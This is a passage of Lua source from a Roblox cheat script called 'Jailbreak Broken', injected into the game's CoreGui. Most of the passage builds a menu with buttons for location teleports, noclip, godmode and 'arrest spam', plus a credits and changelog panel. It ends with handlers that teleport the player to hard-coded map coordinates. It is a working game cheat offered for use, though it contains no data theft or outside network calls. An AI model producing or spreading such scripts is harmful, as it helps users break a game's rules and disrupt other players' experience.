Instance.new("TextButton") local Frame_3 = Instance.new("Frame") local CrimBase2 = Instance.new("TextButton") local Frame_4 = Instance.new("Frame") local PTP = Instance.new("TextButton") local Frame_5 = Instance.new("Frame") local Helipad1 = Instance.new("TextButton") local Frame_6 = Instance.new("Frame") local Helipad2 = Instance.new("TextButton") local Frame_7 = Instance.new("Frame") local Jail = Instance.new("TextButton") local Frame_8 = Instance.new("Frame") local Jewlery = Instance.new("TextButton") local Frame_9 = Instance.new("Frame") local Police = Instance.new("TextButton") local Frame_10 = Instance.new("Frame") local Vault = Instance.new("TextButton") local Frame_11 = Instance.new("Frame") local sframe = Instance.new("ScrollingFrame") local Garage = Instance.new("TextButton") local Frame_12 = Instance.new("Frame") local SPlayer = Instance.new("TextLabel") local Frame_13 = Instance.new("Frame") local Teleports = Instance.new("TextButton") local Frame_14 = Instance.new("Frame") local FBFrame = Instance.new("Frame") local Noclipp = Instance.new("TextButton") local Frame_15 = Instance.new("Frame") local God = Instance.new("TextButton") local Frame_16 = Instance.new("Frame") local Arrest = Instance.new("TextButton") local Frame_17 = Instance.new("Frame") local cframe = Instance.new("Frame") local TextLabel = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local TextLabel_3 = Instance.new("TextLabel") local TextLabel_4 = Instance.new("TextLabel") local TextLabel_5 = Instance.new("TextLabel") local TextLabel_6 = Instance.new("TextLabel") local TextLabel_7 = Instance.new("TextLabel") local TextLabel_8 = Instance.new("TextLabel") local TextLabel_9 = Instance.new("TextLabel") local TextLabel_10 = Instance.new("TextLabel") local TextLabel_11 = Instance.new("TextLabel") local Functions = Instance.new("TextButton") local Frame_18 = Instance.new("Frame") local Credits = Instance.new("TextButton") local Frame_19 = Instance.new("Frame") local GoBack = Instance.new("TextButton") local Open = Instance.new("Frame") local OpenGUI = Instance.new("TextButton") local Frame_20 = Instance.new("Frame") local val = Instance.new("ObjectValue", sframe) -- GUI Properties JailbreakBroken.Name = "JailbreakBroken" JailbreakBroken.Parent = game:GetService("CoreGui") UI.Name = "UI" UI.Parent = JailbreakBroken UI.Active = true UI.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) UI.BackgroundTransparency = 0.30000001192093 UI.BorderColor3 = Color3.new(1, 1, 1) UI.BorderSizePixel = 0 UI.Draggable = true UI.Position = UDim2.new(0.5, -159, 0.5, -219) UI.Size = UDim2.new(0, 318, 0, 438) UI.Visible = false Part.Name = "Part" Part.Parent = UI Part.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Part.BorderColor3 = Color3.new(1, 1, 1) Part.BorderSizePixel = 0 Part.Size = UDim2.new(0, 318, 0, 67) Frame.Parent = Part Frame.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(0, 0, 0, 67) Frame.Size = UDim2.new(0, 318, 0, 5) Unimportant.Name = "Unimportant" Unimportant.Parent = Part Unimportant.BackgroundColor3 = Color3.new(1, 1, 1) Unimportant.BackgroundTransparency = 1 Unimportant.BorderSizePixel = 0 Unimportant.Position = UDim2.new(0, 109, 0, 12) Unimportant.Size = UDim2.new(0, 100, 0, 24) Unimportant.Font = Enum.Font.SourceSansLight Unimportant.FontSize = Enum.FontSize.Size48 Unimportant.Text = "Jailbreak Broken" Unimportant.TextColor3 = Color3.new(1, 1, 1) Unimportant.TextSize = 37 Unimportant2.Name = "Unimportant2" Unimportant2.Parent = Part Unimportant2.BackgroundColor3 = Color3.new(1, 1, 1) Unimportant2.BackgroundTransparency = 1 Unimportant2.BorderSizePixel = 0 Unimportant2.Position = UDim2.new(0, 109, 0, 38) Unimportant2.Size = UDim2.new(0, 100, 0, 24) Unimportant2.Font = Enum.Font.SourceSansLight Unimportant2.FontSize = Enum.FontSize.Size18 Unimportant2.Text = "By Excrio - v2.5" Unimportant2.TextColor3 = Color3.new(1, 1, 1) Unimportant2.TextSize = 17 TPBFrame.Name = "TPBFrame" TPBFrame.Parent = UI TPBFrame.BackgroundColor3 = Color3.new(1, 1, 1) TPBFrame.BackgroundTransparency = 1 TPBFrame.Size = UDim2.new(0, 106, 0, 100) TPBFrame.Visible = false Bank.Name = "Bank" Bank.Parent = TPBFrame Bank.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Bank.BorderColor3 = Color3.new(1, 1, 1) Bank.BorderSizePixel = 0 Bank.Position = UDim2.new(0, 185, 0, 85) Bank.Size = UDim2.new(0, 97, 0, 25) Bank.Font = Enum.Font.SourceSansLight Bank.FontSize = Enum.FontSize.Size18 Bank.Text = "Bank Front" Bank.TextColor3 = Color3.new(1, 1, 1) Bank.TextSize = 17 Frame_2.Parent = Bank Frame_2.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_2.BorderSizePixel = 0 Frame_2.Position = UDim2.new(0, 0, 0, 25) Frame_2.Size = UDim2.new(0, 97, 0, 5) CrimBase1.Name = "CrimBase1" CrimBase1.Parent = TPBFrame CrimBase1.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) CrimBase1.BorderColor3 = Color3.new(1, 1, 1) CrimBase1.BorderSizePixel = 0 CrimBase1.Position = UDim2.new(0, 30, 0, 125) CrimBase1.Size = UDim2.new(0, 97, 0, 25) CrimBase1.Font = Enum.Font.SourceSansLight CrimBase1.FontSize = Enum.FontSize.Size18 CrimBase1.Text = "Crim Base 1" CrimBase1.TextColor3 = Color3.new(1, 1, 1) CrimBase1.TextSize = 17 Frame_3.Parent = CrimBase1 Frame_3.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_3.BorderSizePixel = 0 Frame_3.Position = UDim2.new(0, 0, 0, 25) Frame_3.Size = UDim2.new(0, 97, 0, 5) CrimBase2.Name = "CrimBase2" CrimBase2.Parent = TPBFrame CrimBase2.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) CrimBase2.BorderColor3 = Color3.new(1, 1, 1) CrimBase2.BorderSizePixel = 0 CrimBase2.Position = UDim2.new(0, 30, 0, 165) CrimBase2.Size = UDim2.new(0, 97, 0, 25) CrimBase2.Font = Enum.Font.SourceSansLight CrimBase2.FontSize = Enum.FontSize.Size18 CrimBase2.Text = "Crim Base 2" CrimBase2.TextColor3 = Color3.new(1, 1, 1) CrimBase2.TextSize = 17 Frame_4.Parent = CrimBase2 Frame_4.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_4.BorderSizePixel = 0 Frame_4.Position = UDim2.new(0, 0, 0, 25) Frame_4.Size = UDim2.new(0, 97, 0, 5) PTP.Name = "PTP" PTP.Parent = TPBFrame PTP.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) PTP.BorderColor3 = Color3.new(1, 1, 1) PTP.BorderSizePixel = 0 PTP.Position = UDim2.new(0, 185, 0, 372) PTP.Size = UDim2.new(0, 97, 0, 27) PTP.Font = Enum.Font.SourceSansLight PTP.FontSize = Enum.FontSize.Size18 PTP.Text = "TP to Player" PTP.TextColor3 = Color3.new(1, 1, 1) PTP.TextSize = 17 Frame_5.Parent = PTP Frame_5.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_5.BorderSizePixel = 0 Frame_5.Position = UDim2.new(0, 0, 0, 27) Frame_5.Size = UDim2.new(0, 97, 0, 3) Helipad1.Name = "Helipad1" Helipad1.Parent = TPBFrame Helipad1.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Helipad1.BorderColor3 = Color3.new(1, 1, 1) Helipad1.BorderSizePixel = 0 Helipad1.Position = UDim2.new(0, 185, 0, 125) Helipad1.Size = UDim2.new(0, 97, 0, 25) Helipad1.Font = Enum.Font.SourceSansLight Helipad1.FontSize = Enum.FontSize.Size18 Helipad1.Text = "Helipad 1" Helipad1.TextColor3 = Color3.new(1, 1, 1) Helipad1.TextSize = 17 Frame_6.Parent = Helipad1 Frame_6.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_6.BorderSizePixel = 0 Frame_6.Position = UDim2.new(0, 0, 0, 25) Frame_6.Size = UDim2.new(0, 97, 0, 5) Helipad2.Name = "Helipad2" Helipad2.Parent = TPBFrame Helipad2.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Helipad2.BorderColor3 = Color3.new(1, 1, 1) Helipad2.BorderSizePixel = 0 Helipad2.Position = UDim2.new(0, 185, 0, 165) Helipad2.Size = UDim2.new(0, 97, 0, 25) Helipad2.Font = Enum.Font.SourceSansLight Helipad2.FontSize = Enum.FontSize.Size18 Helipad2.Text = "Helipad 2" Helipad2.TextColor3 = Color3.new(1, 1, 1) Helipad2.TextSize = 17 Frame_7.Parent = Helipad2 Frame_7.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_7.BorderSizePixel = 0 Frame_7.Position = UDim2.new(0, 0, 0, 25) Frame_7.Size = UDim2.new(0, 97, 0, 5) Jail.Name = "Jail" Jail.Parent = TPBFrame Jail.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Jail.BorderColor3 = Color3.new(1, 1, 1) Jail.BorderSizePixel = 0 Jail.Position = UDim2.new(0, 30, 0, 85) Jail.Size = UDim2.new(0, 97, 0, 25) Jail.Font = Enum.Font.SourceSansLight Jail.FontSize = Enum.FontSize.Size18 Jail.Text = "Jail" Jail.TextColor3 = Color3.new(1, 1, 1) Jail.TextSize = 17 Frame_8.Parent = Jail Frame_8.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_8.BorderSizePixel = 0 Frame_8.Position = UDim2.new(0, 0, 0, 25) Frame_8.Size = UDim2.new(0, 97, 0, 5) Jewlery.Name = "Jewlery" Jewlery.Parent = TPBFrame Jewlery.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Jewlery.BorderColor3 = Color3.new(1, 1, 1) Jewlery.BorderSizePixel = 0 Jewlery.Position = UDim2.new(0, 185, 0, 245) Jewlery.Size = UDim2.new(0, 97, 0, 25) Jewlery.Font = Enum.Font.SourceSansLight Jewlery.FontSize = Enum.FontSize.Size18 Jewlery.Text = "Jewelry Store" Jewlery.TextColor3 = Color3.new(1, 1, 1) Jewlery.TextSize = 17 Frame_9.Parent = Jewlery Frame_9.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_9.BorderSizePixel = 0 Frame_9.Position = UDim2.new(0, 0, 0, 25) Frame_9.Size = UDim2.new(0, 97, 0, 5) Police.Name = "Police" Police.Parent = TPBFrame Police.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Police.BorderColor3 = Color3.new(1, 1, 1) Police.BorderSizePixel = 0 Police.Position = UDim2.new(0, 30, 0, 205) Police.Size = UDim2.new(0, 97, 0, 25) Police.Font = Enum.Font.SourceSansLight Police.FontSize = Enum.FontSize.Size18 Police.Text = "Police HQ" Police.TextColor3 = Color3.new(1, 1, 1) Police.TextSize = 17 Frame_10.Parent = Police Frame_10.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_10.BorderSizePixel = 0 Frame_10.Position = UDim2.new(0, 0, 0, 25) Frame_10.Size = UDim2.new(0, 97, 0, 5) Vault.Name = "Vault" Vault.Parent = TPBFrame Vault.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Vault.BorderColor3 = Color3.new(1, 1, 1) Vault.BorderSizePixel = 0 Vault.Position = UDim2.new(0, 30, 0, 245) Vault.Size = UDim2.new(0, 97, 0, 25) Vault.Font = Enum.Font.SourceSansLight Vault.FontSize = Enum.FontSize.Size18 Vault.Text = "Bank Vault" Vault.TextColor3 = Color3.new(1, 1, 1) Vault.TextSize = 17 Frame_11.Parent = Vault Frame_11.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_11.BorderSizePixel = 0 Frame_11.Position = UDim2.new(0, 0, 0, 25) Frame_11.Size = UDim2.new(0, 97, 0, 5) sframe.Name = "sframe" sframe.Parent = TPBFrame sframe.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) sframe.BorderSizePixel = 0 sframe.Position = UDim2.new(0, 30, 0, 293) sframe.Size = UDim2.new(0, 252, 0, 70) sframe.BottomImage = "" sframe.CanvasSize = UDim2.new(0, 0, 1, 0) sframe.MidImage = "" sframe.ScrollBarThickness = 20 sframe.TopImage = "" Garage.Name = "Garage" Garage.Parent = TPBFrame Garage.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Garage.BorderColor3 = Color3.new(1, 1, 1) Garage.BorderSizePixel = 0 Garage.Position = UDim2.new(0, 185, 0, 205) Garage.Size = UDim2.new(0, 97, 0, 25) Garage.Font = Enum.Font.SourceSansLight Garage.FontSize = Enum.FontSize.Size18 Garage.Text = "Garage" Garage.TextColor3 = Color3.new(1, 1, 1) Garage.TextSize = 17 Frame_12.Parent = Garage Frame_12.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_12.BorderSizePixel = 0 Frame_12.Position = UDim2.new(0, 0, 0, 25) Frame_12.Size = UDim2.new(0, 97, 0, 5) SPlayer.Name = "SPlayer" SPlayer.Parent = TPBFrame SPlayer.BackgroundColor3 = Color3.new(1, 1, 1) SPlayer.BackgroundTransparency = 1 SPlayer.Position = UDim2.new(0, 32, 0, 379) SPlayer.Size = UDim2.new(0, 138, 0, 17) SPlayer.Font = Enum.Font.SourceSansLight SPlayer.FontSize = Enum.FontSize.Size18 SPlayer.Text = "Player:" SPlayer.TextColor3 = Color3.new(1, 1, 1) SPlayer.TextSize = 17 SPlayer.TextWrapped = true SPlayer.TextXAlignment = Enum.TextXAlignment.Left Frame_13.Parent = TPBFrame Frame_13.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_13.BorderSizePixel = 0 Frame_13.Position = UDim2.new(0, 30, 0, 360) Frame_13.Size = UDim2.new(0, 252, 0, 5) Teleports.Name = "Teleports" Teleports.Parent = UI Teleports.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Teleports.BorderColor3 = Color3.new(1, 1, 1) Teleports.BorderSizePixel = 0 Teleports.Position = UDim2.new(0, 72, 0, 126) Teleports.Size = UDim2.new(0, 175, 0, 38) Teleports.Font = Enum.Font.SourceSansLight Teleports.FontSize = Enum.FontSize.Size24 Teleports.Text = "Player Teleports" Teleports.TextColor3 = Color3.new(1, 1, 1) Teleports.TextSize = 20 Frame_14.Parent = Teleports Frame_14.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_14.BorderSizePixel = 0 Frame_14.Position = UDim2.new(0, 0, 0, 38) Frame_14.Size = UDim2.new(0, 175, 0, 5) FBFrame.Name = "FBFrame" FBFrame.Parent = UI FBFrame.BackgroundColor3 = Color3.new(1, 1, 1) FBFrame.BackgroundTransparency = 1 FBFrame.Position = UDim2.new(0, 0, 0, 32) FBFrame.Size = UDim2.new(0, 318, 0, 406) FBFrame.Visible = false Noclipp.Name = "Noclipp" Noclipp.Parent = FBFrame Noclipp.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Noclipp.BorderColor3 = Color3.new(1, 1, 1) Noclipp.BorderSizePixel = 0 Noclipp.Position = UDim2.new(0, 110, 0, 181) Noclipp.Size = UDim2.new(0, 97, 0, 38) Noclipp.Font = Enum.Font.SourceSansLight Noclipp.FontSize = Enum.FontSize.Size18 Noclipp.Text = "Enable Noclip" Noclipp.TextColor3 = Color3.new(1, 1, 1) Noclipp.TextSize = 17 Frame_15.Parent = Noclipp Frame_15.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_15.BorderSizePixel = 0 Frame_15.Position = UDim2.new(0, 0, 0, 38) Frame_15.Size = UDim2.new(0, 97, 0, 5) God.Name = "God" God.Parent = FBFrame God.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) God.BorderColor3 = Color3.new(1, 1, 1) God.BorderSizePixel = 0 God.Position = UDim2.new(0, 110, 0, 105) God.Size = UDim2.new(0, 97, 0, 38) God.Font = Enum.Font.SourceSansLight God.FontSize = Enum.FontSize.Size18 God.Text = "Godmode" God.TextColor3 = Color3.new(1, 1, 1) God.TextSize = 17 Frame_16.Parent = God Frame_16.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_16.BorderSizePixel = 0 Frame_16.Position = UDim2.new(0, 0, 0, 38) Frame_16.Size = UDim2.new(0, 97, 0, 5) Arrest.Name = "Arrest" Arrest.Parent = FBFrame Arrest.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Arrest.BorderColor3 = Color3.new(1, 1, 1) Arrest.BorderSizePixel = 0 Arrest.Position = UDim2.new(0, 110, 0, 257) Arrest.Size = UDim2.new(0, 97, 0, 38) Arrest.Font = Enum.Font.SourceSansLight Arrest.FontSize = Enum.FontSize.Size18 Arrest.Text = "Arrest Spam" Arrest.TextColor3 = Color3.new(1, 1, 1) Arrest.TextSize = 17 Frame_17.Parent = Arrest Frame_17.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_17.BorderSizePixel = 0 Frame_17.Position = UDim2.new(0, 0, 0, 38) Frame_17.Size = UDim2.new(0, 97, 0, 5) cframe.Name = "cframe" cframe.Parent = UI cframe.BackgroundColor3 = Color3.new(1, 1, 1) cframe.BackgroundTransparency = 1 cframe.BorderSizePixel = 0 cframe.Size = UDim2.new(0, 318, 0, 438) cframe.Visible = false TextLabel.Parent = cframe TextLabel.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel.BackgroundTransparency = 1 TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0, 23, 0, 103) TextLabel.Size = UDim2.new(0, 273, 0, 31) TextLabel.Font = Enum.Font.SourceSansLight TextLabel.FontSize = Enum.FontSize.Size24 TextLabel.Text = "Design - Excrio" TextLabel.TextColor3 = Color3.new(1, 1, 1) TextLabel.TextSize = 20 TextLabel.TextWrapped = true TextLabel.TextXAlignment = Enum.TextXAlignment.Left TextLabel.TextYAlignment = Enum.TextYAlignment.Top TextLabel_2.Parent = cframe TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_2.BackgroundTransparency = 1 TextLabel_2.BorderSizePixel = 0 TextLabel_2.Position = UDim2.new(0, 23, 0, 128) TextLabel_2.Size = UDim2.new(0, 273, 0, 31) TextLabel_2.Font = Enum.Font.SourceSansLight TextLabel_2.FontSize = Enum.FontSize.Size24 TextLabel_2.Text = "Code - Excrio" TextLabel_2.TextColor3 = Color3.new(1, 1, 1) TextLabel_2.TextSize = 20 TextLabel_2.TextWrapped = true TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left TextLabel_2.TextYAlignment = Enum.TextYAlignment.Top TextLabel_3.Parent = cframe TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_3.BackgroundTransparency = 1 TextLabel_3.BorderSizePixel = 0 TextLabel_3.Position = UDim2.new(0, 23, 0, 151) TextLabel_3.Size = UDim2.new(0, 273, 0, 135) TextLabel_3.Font = Enum.Font.SourceSansLight TextLabel_3.FontSize = Enum.FontSize.Size24 TextLabel_3.Text = "Other Credit - To whomever wrote a thread about getPlayers() as I had some trouble updating the loop, thanks for that." TextLabel_3.TextColor3 = Color3.new(1, 1, 1) TextLabel_3.TextSize = 20 TextLabel_3.TextWrapped = true TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left TextLabel_3.TextYAlignment = Enum.TextYAlignment.Top TextLabel_4.Parent = cframe TextLabel_4.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_4.BackgroundTransparency = 1 TextLabel_4.BorderSizePixel = 0 TextLabel_4.Position = UDim2.new(0, 23, 0, 388) TextLabel_4.Size = UDim2.new(0, 273, 0, 29) TextLabel_4.Font = Enum.Font.SourceSansLight TextLabel_4.FontSize = Enum.FontSize.Size24 TextLabel_4.Text = "" TextLabel_4.TextColor3 = Color3.new(1, 1, 1) TextLabel_4.TextSize = 20 TextLabel_4.TextWrapped = true TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left TextLabel_4.TextYAlignment = Enum.TextYAlignment.Top TextLabel_5.Parent = cframe TextLabel_5.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_5.BackgroundTransparency = 1 TextLabel_5.BorderSizePixel = 0 TextLabel_5.Position = UDim2.new(0, 23, 0, 234) TextLabel_5.Size = UDim2.new(0, 273, 0, 30) TextLabel_5.Font = Enum.Font.SourceSansLight TextLabel_5.FontSize = Enum.FontSize.Size28 TextLabel_5.Text = "Changelog" TextLabel_5.TextColor3 = Color3.new(1, 1, 1) TextLabel_5.TextSize = 25 TextLabel_5.TextWrapped = true TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left TextLabel_5.TextYAlignment = Enum.TextYAlignment.Top TextLabel_6.Parent = cframe TextLabel_6.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_6.BackgroundTransparency = 1 TextLabel_6.BorderSizePixel = 0 TextLabel_6.Position = UDim2.new(0, 23, 0, 76) TextLabel_6.Size = UDim2.new(0, 273, 0, 31) TextLabel_6.Font = Enum.Font.SourceSansLight TextLabel_6.FontSize = Enum.FontSize.Size28 TextLabel_6.Text = "Credit" TextLabel_6.TextColor3 = Color3.new(1, 1, 1) TextLabel_6.TextSize = 25 TextLabel_6.TextWrapped = true TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left TextLabel_6.TextYAlignment = Enum.TextYAlignment.Top TextLabel_7.Parent = cframe TextLabel_7.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_7.BackgroundTransparency = 1 TextLabel_7.BorderSizePixel = 0 TextLabel_7.Position = UDim2.new(0, 23, 0, 263) TextLabel_7.Size = UDim2.new(0, 273, 0, 31) TextLabel_7.Font = Enum.Font.SourceSansLight TextLabel_7.FontSize = Enum.FontSize.Size24 TextLabel_7.Text = "V1.0 - 1.5 Location Teleporting" TextLabel_7.TextColor3 = Color3.new(1, 1, 1) TextLabel_7.TextSize = 20 TextLabel_7.TextWrapped = true TextLabel_7.TextXAlignment = Enum.TextXAlignment.Left TextLabel_7.TextYAlignment = Enum.TextYAlignment.Top TextLabel_8.Parent = cframe TextLabel_8.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_8.BackgroundTransparency = 1 TextLabel_8.BorderSizePixel = 0 TextLabel_8.Position = UDim2.new(0, 23, 0, 286) TextLabel_8.Size = UDim2.new(0, 273, 0, 31) TextLabel_8.Font = Enum.Font.SourceSansLight TextLabel_8.FontSize = Enum.FontSize.Size24 TextLabel_8.Text = "V1.6 - 1.7 Player functions (God, Noclip)" TextLabel_8.TextColor3 = Color3.new(1, 1, 1) TextLabel_8.TextSize = 20 TextLabel_8.TextWrapped = true TextLabel_8.TextXAlignment = Enum.TextXAlignment.Left TextLabel_8.TextYAlignment = Enum.TextYAlignment.Top TextLabel_9.Parent = cframe TextLabel_9.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_9.BackgroundTransparency = 1 TextLabel_9.BorderSizePixel = 0 TextLabel_9.Position = UDim2.new(0, 23, 0, 306) TextLabel_9.Size = UDim2.new(0, 273, 0, 31) TextLabel_9.Font = Enum.Font.SourceSansLight TextLabel_9.FontSize = Enum.FontSize.Size24 TextLabel_9.Text = "V1.8 - 1.9 More player functions (Arrest Spam)" TextLabel_9.TextColor3 = Color3.new(1, 1, 1) TextLabel_9.TextSize = 20 TextLabel_9.TextWrapped = true TextLabel_9.TextXAlignment = Enum.TextXAlignment.Left TextLabel_9.TextYAlignment = Enum.TextYAlignment.Top TextLabel_10.Parent = cframe TextLabel_10.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_10.BackgroundTransparency = 1 TextLabel_10.BorderSizePixel = 0 TextLabel_10.Position = UDim2.new(0, 23, 0, 327) TextLabel_10.Size = UDim2.new(0, 273, 0, 31) TextLabel_10.Font = Enum.Font.SourceSansLight TextLabel_10.FontSize = Enum.FontSize.Size24 TextLabel_10.Text = "V2.0 - V2.4 New UI, drastic bug fixes" TextLabel_10.TextColor3 = Color3.new(1, 1, 1) TextLabel_10.TextSize = 20 TextLabel_10.TextWrapped = true TextLabel_10.TextXAlignment = Enum.TextXAlignment.Left TextLabel_10.TextYAlignment = Enum.TextYAlignment.Top TextLabel_11.Parent = cframe TextLabel_11.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel_11.BackgroundTransparency = 1 TextLabel_11.BorderSizePixel = 0 TextLabel_11.Position = UDim2.new(0, 23, 0, 351) TextLabel_11.Size = UDim2.new(0, 273, 0, 42) TextLabel_11.Font = Enum.Font.SourceSansLight TextLabel_11.FontSize = Enum.FontSize.Size24 TextLabel_11.Text = "V2.4 - 2.5 (Current) Another new UI, player teleporting" TextLabel_11.TextColor3 = Color3.new(1, 1, 1) TextLabel_11.TextSize = 20 TextLabel_11.TextWrapped = true TextLabel_11.TextXAlignment = Enum.TextXAlignment.Left TextLabel_11.TextYAlignment = Enum.TextYAlignment.Top Functions.Name = "Functions" Functions.Parent = UI Functions.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Functions.BorderColor3 = Color3.new(1, 1, 1) Functions.BorderSizePixel = 0 Functions.Position = UDim2.new(0, 72, 0, 219) Functions.Size = UDim2.new(0, 175, 0, 38) Functions.Font = Enum.Font.SourceSansLight Functions.FontSize = Enum.FontSize.Size24 Functions.Text = "Player Functions" Functions.TextColor3 = Color3.new(1, 1, 1) Functions.TextSize = 20 Frame_18.Parent = Functions Frame_18.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_18.BorderSizePixel = 0 Frame_18.Position = UDim2.new(0, 0, 0, 38) Frame_18.Size = UDim2.new(0, 175, 0, 5) Credits.Name = "Credits" Credits.Parent = UI Credits.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) Credits.BorderColor3 = Color3.new(1, 1, 1) Credits.BorderSizePixel = 0 Credits.Position = UDim2.new(0, 72, 0, 315) Credits.Size = UDim2.new(0, 175, 0, 38) Credits.Font = Enum.Font.SourceSansLight Credits.FontSize = Enum.FontSize.Size24 Credits.Text = "Credits / Changelog" Credits.TextColor3 = Color3.new(1, 1, 1) Credits.TextSize = 20 Frame_19.Parent = Credits Frame_19.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529) Frame_19.BorderSizePixel = 0 Frame_19.Position = UDim2.new(0, 0, 0, 38) Frame_19.Size = UDim2.new(0, 175, 0, 5) GoBack.Name = "GoBack" GoBack.Parent = UI GoBack.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) GoBack.BackgroundTransparency = 1 GoBack.BorderColor3 = Color3.new(1, 1, 1) GoBack.BorderSizePixel = 0 GoBack.Position = UDim2.new(0, 0, 0, 400) GoBack.Size = UDim2.new(0, 93, 0, 38) GoBack.Visible = false GoBack.Font = Enum.Font.SourceSansLight GoBack.FontSize = Enum.FontSize.Size24 GoBack.Text = "Go Back" GoBack.TextColor3 = Color3.new(1, 1, 1) GoBack.TextSize = 20 Open.Name = "Open" Open.Parent = JailbreakBroken Open.BackgroundColor3 = Color3.new(0.235294, 0.494118, 0.776471) Open.BackgroundTransparency = 1 Open.BorderColor3 = Color3.new(1, 1, 1) Open.BorderSizePixel = 0 Open.Position = UDim2.new(0, -105, 0, 632) Open.Size = UDim2.new(0, 318, 0, 67) OpenGUI.Name = "OpenGUI" OpenGUI.Parent = Open OpenGUI.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961) OpenGUI.BorderColor3 = Color3.new(1, 1, 1) OpenGUI.BorderSizePixel = 0 OpenGUI.Position = UDim2.new(0, 93, 0, 15) OpenGUI.Size = UDim2.new(0, 97, 0, 38) OpenGUI.Font = Enum.Font.SourceSansLight OpenGUI.FontSize = Enum.FontSize.Size18 OpenGUI.Text = "Open GUI" OpenGUI.TextColor3 = Color3.new(1, 1, 1) OpenGUI.TextSize = 17 Frame_20.Parent = OpenGUI Frame_20.BackgroundColor3 = Color3.new(0.0705882, 0.0705882, 0.0705882) Frame_20.BorderSizePixel = 0 Frame_20.Position = UDim2.new(0, 0, 0, 38) Frame_20.Size = UDim2.new(0, 97, 0, 5) -- Teleporting Jail.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1138.66, 18.009, -1430.01) + Vector3.new(1,0,0) end) CrimBase1.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-222.339157, 17.9125443, 1575.82336) + Vector3.new(1,0,0) end) CrimBase2.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1579.4823, 49.787693, -1759.61438) + Vector3.new(1,0,0) end) Police.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1130.11426, 17.950058, -1593.09766) + Vector3.new(1,0,0) end) Bank.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-11.036747, 17.9193821, 797.971521) + Vector3.new(1,0,0) end) Helipad1.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1172.01172, 59.586, -1553.929) + Vector3.new(1,0,0) end) Helipad2.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(741.508, 71.005, 1136.33826) + Vector3.new(1,0,0) end) Garage.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-341.0529, 19.644, 1182.502) + Vector3.new(1,0,0) end) 